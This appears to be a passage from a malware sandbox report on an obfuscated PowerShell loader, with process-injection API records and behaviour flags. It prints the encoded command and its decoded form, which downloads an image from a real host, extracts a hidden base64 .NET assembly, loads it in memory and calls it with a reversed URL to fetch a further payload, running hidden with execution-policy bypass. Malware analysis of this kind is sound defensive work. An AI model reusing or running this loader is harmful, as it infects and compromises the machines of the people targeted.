v€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)"
Process injection Process 1960 resumed a thread in remote process 2108
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000364
suspend_count: 1
process_identifier: 2108
1 0 0
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe